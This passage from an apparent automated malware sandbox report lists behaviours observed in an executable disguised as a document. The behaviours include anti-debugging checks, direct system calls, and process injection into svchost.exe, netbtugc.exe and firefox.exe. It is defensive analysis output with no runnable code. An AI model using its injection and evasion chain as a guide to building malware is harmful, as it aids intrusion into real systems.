            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]2_2_0336CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]2_2_0336CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]2_2_0335EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]2_2_033BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]2_2_033DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]2_2_03386AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]2_2_03368A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]2_2_03404A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]2_2_03330AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404940 mov eax, dword ptr fs:[00000030h]2_2_03404940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]2_2_033B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]2_2_033C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]2_2_033BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]2_2_033BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]2_2_033B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]2_2_033BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]2_2_033649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]2_2_033FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]2_2_033C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]2_2_0336A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]2_2_033BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]2_2_033BE872
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_009A0B62
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00972622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00972622
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0096083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0096083F
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009609D5 SetUnhandledExceptionFilter,0_2_009609D5
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00960C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00960C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtQueryValueKey: Direct from: 0x77672BECJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtClose: Direct from: 0x77672B6C
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtOpenKeyEx: Direct from: 0x77673C9CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 7296Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeJump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 29B4008Jump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009A1201
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00982BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00982BA5
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009AB226 SendInput,keybd_event,0_2_009AB226
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009C22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_009C22DA
            Source: C:\Users\user\Desktop\Document 151-512024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document 151-512024.exe"Jump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_009A0B62
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009A1663
            Source: Document 151-512024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
